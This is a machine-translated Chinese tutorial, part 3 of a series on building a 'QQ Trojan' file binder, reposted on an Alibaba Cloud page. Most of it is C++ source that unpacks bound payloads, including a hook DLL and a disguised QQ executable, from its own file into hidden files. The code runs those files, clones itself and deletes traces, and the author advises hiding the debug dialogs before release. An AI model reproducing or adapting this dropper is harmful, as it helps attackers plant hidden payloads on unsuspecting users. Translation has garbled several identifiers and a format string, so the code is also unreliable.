QQ Trojan-file binding by yourself (part 3)

Last Update:2018-12-05 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

3. unbind_and_run ()
// Break down merged files and run them at the same time
Bool cbindfile: unbind_and_run ()
{
Handle hfileout = NULL; // stores the processed file
DWORD bytesin = 0; // number of data read at a time
DWORD bytesout = 0; // number of written data
DWORD totalbytes = 0; // the remaining number of reads after each read

Cstring temp_dll = strunbindfilepath_dll; // The Name Of The decomposed DLL file
CString temp_Sec; // bind file name after decomposition

DWORD prog_length = 0; // The length of the bound File
Unsigned int I = 0;
// Locate the file pointer to the end of the bundle program length
If (SetFilePointer (hFileMyself, (LONG) modify_data.my_length,
NULL, FILE_BEGIN )! = Modify_data.my_length)
{
// An error occurred while locating the file pointer.
MessageBox (NULL, "An error occurred while locating the file pointer while splitting the file! ", NULL, NULL );
Return false;
}
// Read the length of the first bound File
If (0 = readfile (hfilemyself, & prog_length, sizeof (prog_length ),
& Bytesin, null ))
{
// MessageBox (null, "An error occurred while reading the first bound file in the separated file! "," Error ", mb_ OK );
Return false;
}
// Read the file extension
If (0 = readfile (hfilemyself, m_ext, 3, & bytesin, null ))
{
MessageBox (null, "An error occurred while reading the first bound file extension in the detached file! "," Error ", mb_ OK );
Return false;
}
// Check whether the file already exists. If the file already exists, it does not need to be decomposed.
Hfileout = createfile (temp_dll,
Generic_read, file_1__read,
NULL, OPEN_EXISTING,
FILE_ATTRIBUTE_HIDDEN, NULL );
If (INVALID_HANDLE_VALUE! = HFileOut)
{
// Directly move the Object Pointer Forward the object Length
SetFilePointer (hFileMyself, prog_length, NULL, FILE_CURRENT );
} Else
{
// Create the first decomposed file, that is, HOOK. DLL.
HFileOut = CreateFile (temp_Dll,
GENERIC_WRITE, file_pai_write,
Null, create_always,
File_attribute_hidden, null );
If (invalid_handle_value = hfileout)
{
MessageBox (null, "An error occurred while creating the first file to be bound in the detached file! "," Error ", mb_ OK );
Return false;
}
// Read data with the length of prog_length and write the content of the first file
Totalbytes = prog_length;
Do {
If (totalbytes <= buf_size)
{
// Last read
If (0 = readfile (hfilemyself, Buf, totalbytes, & bytesin,
Null ))
{
Closehandle (hfileout );
MessageBox (null, "An error occurred while reading the content of the first bound file in the detached file! ",
Null, null );
Return false;
}
}
Else
{
If (0 = readfile (hfilemyself, Buf, buf_size, & bytesin,
Null ))
{
Closehandle (hfileout );
MessageBox (NULL, "An error occurred while reading the content of the first bound file in the detached file! ", NULL, NULL );
Return false;
}
}
// Write read data
If (0 = WriteFile (hFileOut, buf, bytesin, & bytesout,
NULL ))
{
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while writing the content of the first file in the decomposed file! ",
NULL, NULL );
Return false;
}
// Subtract the number of read entries until the read ends.
Totalbytes-= bytesin;
} While (0! = Totalbytes );

Prog_length = 0;
ZeroMemory (m_Ext, sizeof (m_Ext ));
Closehandle (hfileout );
// Read the length of the second bound File
If (0 = readfile (hfilemyself, & prog_length, sizeof (prog_length ),
& Bytesin, null ))
{
MessageBox (null, "An error occurred while reading the second bound file in the detached file! "," Error ", mb_ OK );
Return false;
}
// Read the file extension
If (0 = readfile (hfilemyself, m_ext, 3, & bytesout, null ))
{
MessageBox (null, "An error occurred while reading the second bound File Execution flag in the detached file! "," Error ", mb_ OK );
Return false;
}
// Determine the name of the second decomposed File
Temp_Sec.Format ("% sQicq. % s", szMyFilePath, m_Ext );
StrUnbindFilePath_Sec = temp_Sec;
MessageBox (NULL, temp_Sec, NULL, NULL );
// Create the second bound File
HFileOut = CreateFile (temp_Sec,
GENERIC_WRITE, file_pai_write,
NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_HIDDEN, NULL );
If (INVALID_HANDLE_VALUE = hFileOut)
{
MessageBox (NULL, "An error occurred while creating the second bound file in the detached file! "," Error ", MB_ OK );
Return false;
}
Totalbytes = prog_length;
Do
{
If (totalbytes <= BUF_SIZE)
{
If (0 = ReadFile (hFileMyself, buf, totalbytes, & bytesin,
NULL ))
{
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while reading the content of the first bound file in the detached file! ",
NULL, NULL );
Return false;
}
}
Else
{
If (0 = ReadFile (hFileMyself, buf, BUF_SIZE, & bytesin,
NULL ))
{
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while reading the second bound file in the detached file! ",
NULL, NULL );
Return false;
}
}
If (0 = WriteFile (hFileOut, buf, bytesin, & bytesout,
NULL ))
{
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while writing the content of the second file in the decomposed file! ",
NULL, NULL );
Return false;
}
Totalbytes-= bytesin;
} While (0! = Totalbytes );

CloseHandle (hFileOut );

MessageBox (NULL, temp_Sec, "PRINT", NULL );
// Run the decomposed target file
Create_Process (temp_Sec, true );
Return true;
}

4. CloneMySelf_and_Run ()
/The content of a new file that contains the original bound file and DLL file is the same as that of the SERVER,
// Break down the bound files and run them.
Bool CBindFile: CloneMySelf_and_Run ()
{
HANDLE hFileOut = NULL;
DWORD bytesin = 0; // number of bytes read
DWORD bytesout = 0; // number of written bytes
DWORD totalbytes = 0; // the remaining number after each read
DWORD prog_length = 0; // File Size
Cstring temp_fst; // name of the first file to be decomposed
Cstring temp_sec; // name of the Second file

// Randomly generate a file name composed of numbers
Temp_Fst.Format ("ipvs000006d.exe", szMyFilePath, rand ());
MessageBox (NULL, temp_Fst, NULL, NULL );

// Create the file to be written
HFileOut = CreateFile (temp_Fst, GENERIC_WRITE, file_pai_write, NULL,
CREATE_ALWAYS, FILE_ATTRIBUTE_HIDDEN, NULL );
If (INVALID_HANDLE_VALUE = hFileOut)
{
// An error occurred while creating the target file.
MessageBox (NULL, "failed to create the first file in the cloned file! ", NULL, NULL );
Return false;
}
SetFilePointer (hFileMyself, 0, NULL, FILE_BEGIN );
Totalbytes = modify_data.my_length;
Do
{
If (totalbytes <= buf_size)
{
Readfile (hfilemyself, Buf, totalbytes, & bytesin, null );
}
Else
{
Readfile (hfilemyself, Buf, buf_size, & bytesin, null );
}
Writefile (hfileout, Buf, bytesin, & bytesout, null );
Totalbytes-= bytesin;
} While (0! = Totalbytes );

// Read the DLL length and running flag.
If (0 = readfile (hfilemyself, & prog_length, sizeof (prog_length), & bytesin, null ))
{
// An error occurred while reading the DLL file length.
MessageBox (NULL, "An error occurred while reading the DLL file in the cloned file! ", NULL, NULL );
CloseHandle (hFileOut );
Return false;
}
If (0 = WriteFile (hFileOut, & prog_length, sizeof (prog_length), & bytesout, NULL ))
{
// An error occurred while writing the dll file length.
MessageBox (NULL, "An error occurred while writing the DLL file to clone its own file! ", NULL, NULL );
CloseHandle (hFileOut );
Return false;
}
Totalbytes = prog_length + 3;
Do
{
If (totalbytes <= BUF_SIZE)
{
Readfile (hfilemyself, Buf, totalbytes, & bytesin, null );
}
Else
{
Readfile (hfilemyself, Buf, buf_size, & bytesin, null );
}
Writefile (hfileout, Buf, bytesin, & bytesout, null );
Totalbytes-= bytesin;
} While (0! = Totalbytes );
Closehandle (hfileout );

// Run the file and wait until the running of the file ends. Delete the temporary file.
Process_information PI;
Startupinfo Si;
Zeromemory (& Si, sizeof (SI ));
SI. cb = sizeof (SI );
ZeroMemory (& PI, sizeof (PI ));
If (Create_Process (temp_Fst, true ))
{
GetRunFileProcessInfo (PI );
// Delete the temporary files after the operation is completed
WaitForSingleObject (PI. hProcess, INFINITE );
DWORD dwExitCode;
GetExitCodeProcess (PI. hProcess, & dwExitCode );
CloseHandle (PI. hThread );
CloseHandle (PI. hProcess );
}
DeleteFile (temp_Fst );

// Break down the second file and run it
Prog_length = 0;
ZeroMemory (& m_Ext, sizeof (m_Ext ));
// Read the length of the second bound File
If (0 = ReadFile (hFileMyself, & prog_length, sizeof (prog_length), & bytesin, NULL ))
{
MessageBox (NULL, "An error occurred while reading the second bound file in the detached file! "," Error ", MB_ OK );
Return false;
}

// Read the file extension
If (0 = ReadFile (hFileMyself, m_Ext, 3, & bytesout, NULL ))
{
MessageBox (NULL, "An error occurred while reading the second bound File Execution flag in the detached file! "," Error ", MB_ OK );
Return false;
}

// Determine the name of the second decomposed File
Temp_Sec.Format ("% s % 06d. % s", szMyFilePath, rand (), m_Ext );
MessageBox (NULL, temp_Sec, NULL, NULL );
// Create the second bound File
HFileOut = CreateFile (temp_Sec, GENERIC_WRITE, file_pai_write, NULL, CREATE_ALWAYS,
FILE_ATTRIBUTE_HIDDEN, NULL );
If (INVALID_HANDLE_VALUE = hFileOut)
{
MessageBox (NULL, "An error occurred while creating the second bound file in the detached file! "," Error ", MB_ OK );
Return false;
}

Totalbytes = prog_length;
Do
{
If (totalbytes <= BUF_SIZE)
{
If (0 = ReadFile (hFileMyself, buf, totalbytes, & bytesin, NULL ))
{
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while reading the content of the first bound file in the detached file! ", NULL, NULL );
Return false;
}
}
Else
{
If (0 = ReadFile (hFileMyself, buf, BUF_SIZE, & bytesin, NULL ))
{
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while reading the second bound file in the detached file! ", NULL, NULL );
Return false;
}
}
If (0 = WriteFile (hFileOut, buf, bytesin, & bytesout, NULL ))
{
CloseHandle (hFileOut );
MessageBox (NULL, "An error occurred while writing the content of the second file in the decomposed file! ", NULL, NULL );
Return false;
}
Totalbytes-= bytesin;
} While (0! = Totalbytes );

CloseHandle (hFileOut );

// Set the execution mode for the second file
If (0 = lstrcmp (m_Ext, "exe "))
{
If (Create_Process (temp_Sec, true ))
{
GetRunFileProcessInfo (PI );
// Delete the temporary files after the operation is completed
WaitForSingleObject (PI. hProcess, INFINITE );
CloseHandle (PI. hThread );
CloseHandle (PI. hProcess );
}
DeleteFile (temp_Sec );
}
Else
{
Create_Process (temp_Sec, false );
}
Return true;
}
Because this program cannot be debugged in one step, you can only determine the running status by displaying the variable value in the dialog box during running,
Therefore, a lot of MessageBox is added to the program. You have to hide these messageboxes before the program is released, or you will have to hide them. Haha ~
Finally, I would like to thank Xu Jingzhou Future Studio for bundling multiple files
The CBindFileDlg class in an executable file is rewritten.

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

QQ Trojan-file binding by yourself (part 3)

Contact Us

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support